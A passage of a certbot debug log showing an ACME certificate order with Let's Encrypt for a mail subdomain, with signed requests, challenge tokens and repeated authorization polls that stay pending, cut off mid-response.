"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlqZDB5enJWNmotZ1dGS01mUXhjUXdLWTh4bFBvcUprZmZLUEdkNnh6NUUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "hS7qYt3RRHk1LAi7encEP5ydfY_ml4lMwYzddNWa9F1GJArk2rOQNDaTiZhtZ54ZHgTnFSXD1iaXFNxjKuYOQYmXQQIXHDK3suCaoZvEOTJzneL_V4Vpvq9ai2erj0lgXDDn3h1vy7hmXgYrhVH8FtXENrl17vR1wpu9z2_LHEBd2WDhnD9rZtG14yvstb3WXrTFd32H0UbBLVEiiMvy7rNPUWS_DP-v2HU7MQqbmYfLV5IyMINr8hANSrb-AeygAnnORl2maALqklOsh9qLximoeeNPjQqxn3zi00BCo8vdC6ni2OeYq51NOpEMZx1W4aRKIA0Vl32snJ10d155pQ",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9"
}
2026-02-14 23:36:11,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353
2026-02-14 23:36:11,402:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 23:36:11 GMT
Content-Type: application/json
Content-Length: 353
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
Replay-Nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"identifiers": [
{
"type": "dns",
"value": "mail.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826"
}
2026-02-14 23:36:11,402:DEBUG:acme.client:Storing nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU
2026-02-14 23:36:11,402:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:11,407:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnRJenNuT0FSNlhlZGNlVmtyb1Y1TTBfenVQUk1jZDlUbFMzc2huMUNrYlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "VIIB53BtybPvpHqUpW6dcUf6xjmhnnx3o-qgX79kka0gM8YwirNDwgke5h9pZql7yBIkATNixyK4HCWvVlecC3MN0IkEJ53oyxZcaGfXt2QAU9i6oACnB6t-w9wBMDMnrgEUx5Li_JCkSUINfugXzI-7MOKx7p5CUBP-mYdJig3tOmJ4JGw16RO1JkSTTZdGJPWfsP5m3EE-PBXzhZpPiHtQsl_UnTKMOa87ZZx6I7W8vEOFnvkNZEoDtchZ1sUqvVHJ3ZE_eNcmvzFUaoGVuntO6FFXNZ3O9muh8G-WwvJ1bnvsvCfTqu97T-aFcMylqrcyexkH4v83QZyNqBTfvA",
"payload": ""
}
2026-02-14 23:36:11,656:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:11,657:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:11 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:11,657:DEBUG:acme.client:Storing nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc
2026-02-14 23:36:11,658:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
2026-02-14 23:36:11,659:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
2026-02-14 23:36:11,659:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-14 23:36:11,660:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24
2026-02-14 23:36:11,661:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-14 23:36:11,665:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZm5hdTdlcUlQUUxXUGk1YTVESXlfTkYxWkk3eFpmNzhXQVpRajNCQjJKbWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2L3AycVRiQSJ9",
"signature": "UAkT6hrIidAF2zSXH_PgoxAhMbBqy_mGKDijU4JjeR5s9HJfpDcVaSqee9oN5yCkCrXnNsH9zK9wzdDgxpIDjmJkFYbjk-M_cvwcZrVOUvcMN2hND8WUmi1qFo4g6H5ac3vnrSQGmezZWqbL89jsesiFdiNTT3nybD9MDgKYNkCK9uYfvvbptHfJjqDUZxcK9_diXeEMM2k5dCm24HJ7S5wq6XJaT8UPdzpjOYy7eBwe_HoibdZbq1eSvUahqkn1EKhFherx9Jd2SezsfLyWhMELL_TX18ioAV7WpbjGCZHdA_u2A8F2qZ43VDdTMn0ojFwn0po9RLHcyRGViSkvmg",
"payload": "e30"
}
2026-02-14 23:36:11,847:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658784998136/p2qTbA HTTP/1.1" 200 195
2026-02-14 23:36:11,847:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:11 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA
Replay-Nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
2026-02-14 23:36:11,848:DEBUG:acme.client:Storing nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY
2026-02-14 23:36:11,848:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-14 23:36:12,849:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:12,854:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlGanplbkJ0bldtNVRoRXgtdTUwSWhEZUhkbDF5QXRIbjItbVR3UXNBSFkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "OQKujp_YXK3K3_7tpgFsoWLqJKMQ32y9o4du19oagQFikl-ooY1XplCBv0vZ2Cy7cjtAvXbYNW1ghSEZFV6biikNZPikRUQYgKs_bLwWZ-0i1Kn8lMFYAwx0mAjkzOpKuIuwrtRkK9lJ32NbbUrk4DDt4KLvvvyPbEyQPebyyJgT38lnbjt-4oiiWZbxHuEvZ1bvnqcsQ-tZAd4qvKRAn7_Vbxl6saSycUUqSzigxEZzHFu4IlSaxDZrU0vnlNv8cf40HD6cvbd6BIEsTpEKBm-yeurlMUiyJo2NRoD_rwhuqSzXFOxEbVwG8dfsTpe0buuj9UZN2H0zwsgs8Q8u2w",
"payload": ""
}
2026-02-14 23:36:13,032:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:13,032:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:12 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:13,033:DEBUG:acme.client:Storing nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s
2026-02-14 23:36:13,033:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:16,034:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:16,039:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmxuY09aMmYwdTRlQVRKOWVTR29tV01iSHpic0pOQks2Mk40dm9CNWV5OHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "wtj2sJb8hLpscvxxPJsaTgcupXELXXz3myVAWrKl-H_NLOj9Pj9MNJAFctIQcGrhD18FT62piRVaPXqhCgHA5T60IInIsA8Dkw2nJ_nO7lUXyDPBvkUy4zIiyws4ltD88TM8H2cJ1X11l_wSsRxBdUHS-lZcCxKZN-QWc7Wjq3hJ0qsQ0Nwob1yMVqodkVG_o9K5f9oM56A63Zq4iaSBqs28NrNgLE2yq5KpzV8IOpoLSrCStcsOiZmfF8edr8wvncdBWCJdbkhhlQAVfDCQwcTybTaiAXN6Xru5S7xjgUBcnI8xAChomx4_rlPuAk09wPpYDItLjPKLAMRq29u2dA",
"payload": ""
}
2026-02-14 23:36:16,216:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:16,217:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:16 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:16,217:DEBUG:acme.client:Storing nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4
2026-02-14 23:36:16,217:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:19,218:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:19,223:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmU0aWREYmFvZkpaRUZtZEQ4VjBWNmFDcldfWmFEMVZZU1FjM0VhV3lVSzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "ciW6DyQP78rgmZ51FyebnqW3KJL-Uy0ywjJZmLJyQrJ4XrIu-Ez9FYjZz26LLb4tQOOq8rXagdVrZxz-Lxsix8ZeUKbdl64oo0SM4gNkmym9vtieX4hpYoattzSRfwU11cnFU6TS71zfLyFUbFqqBZRDwYnqG400lFNfskR3Sid2xMNs5nFDqdQHHjjr7WW_AiaeGHxtLvuGVmnlSbKaW-06uUKqmafzkvIbSb0YtvfiYQtdhTdjnFwvSStUbaRILk_qk4TX_yqTgolzrFEHHXuwuMRknrDVAaPbqVKRCULFyhRWc73sY7RD_dJqdAyBuiiFH-fiWE0OcqSeVn5PJw",
"payload": ""
}
2026-02-14 23:36:19,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:19,401:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:19 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:19,402:DEBUG:acme.client:Storing nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8
2026-02-14 23:36:19,402:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:22,403:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:22,408:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlVsWThYQ09NWWxTaTJ2ZDQ2UG5DVWhZUmZMbkJwbF9qV04xV2NHSzQ0bTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "FeEWQxADvM2U39b3BudpI4fbKijrnNyjRMuioQY1M9xqYMddQRCVrEB1wgskJpptl9bXVPM3_dziTWrLoXZeOe2fHk0tctPgFVznmUNZ2brEBe_73jmNjxBmiVWLDyVp_vj0onI0ViwCWBrNvCysuQjceVKNHH37SbcAiS1hOkHrM3goEdVCp3PoZIWLB1YpYGBDFNkBcsDAvFCqFc2_-Ui_3qPNmyoG9gcr5tGM2AMhIgFBGDc5cGKEKbpbakliROV6vd7nzKgUqFiZgBGx_lb2AGd54BSUY9eS7j6uXq3GwaXKCVDKsDZYZKxsgAslt215LDzsMSiW8TbEVzk2Uw",
"payload": ""
}
2026-02-14 23:36:22,585:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:22,586:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:22 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:22,586:DEBUG:acme.client:Storing nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4
2026-02-14 23:36:22,586:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:25,587:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:25,592:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlpTUHczT3daenFxR0RDNXNWb3JWeDJfZUtzejc0QXp2Z1NUZjZKenpsbTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "EPwBlNMTpV945kv0wjedT5sN_-EZ66YiQ2hMIMnk642rDcmD3QxXvRorvW-UZXGOW-zDH9_FJ6mXnxHm0TmbVp3qHXIRHhmM7pJKTuuO5Q9bh2Tg5iquTnkOwGhYRSAL9947GxQP6SWAP2tw5LgC3QNDNfh_PQu477BX_SPUI_7N3XksR2_YRq5FJMRGiLAHzJ6a4jS8Qw7iVYUu-JXUNuWDcWr2qBAjUA4wFJDBLZP1bKCOP0GNenx78BAjjlqGxOA6y6U_Vve2hQpRrnMkdFpn0JaqVi7S54VN8_cdv6VFs1nvfAKWR7mFWSFUp8y5-oeRU6t0dw88O2FCb4Gtvw",
"payload": ""
}
2026-02-14 23:36:25,782:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:25,783:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:25 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:25,783:DEBUG:acme.client:Storing nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw
2026-02-14 23:36:25,784:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:28,784:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:28,789:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnR2SUdJLUFnZnBtUzQ3VHJtYThkSWNtSU9sbjAtQ0RjXzN3WGZJSzNPQXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "ilecAhgNDvzPhyiO67TcRdjIDVfiU0R-f14MptFH87fuaoeWltWtdAvii0u2s0rT8LCVj5s_3yWws2JKZliij4kgeaksgvEYgpFd8ht5NJggstzEYOruP_5v-_8Ud9kNHikz2xp7NDI8og7Xot9W3ZWUU1JuCisf5_uGie1ioUF-hUs63igiRmm3SctLS0TDMbdgIlIebINPebWxUyR_phtnojgqb3N_oVwreilYxw3LWb8vYheiVa69g3hvaFL43dTRTVUXU_3u-Ta1VcK62DVs_WMsA81Bve-jYuWnHMgfZnULW_uSYF_3Sf5vSBq_F3MSN2b2by7IBhWWyKU0ow",
"payload": ""
}
2026-02-14 23:36:29,051:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
2026-02-14 23:36:29,052:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:28 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:36:11Z",
"challenges": [
{
"type": "dns-01",
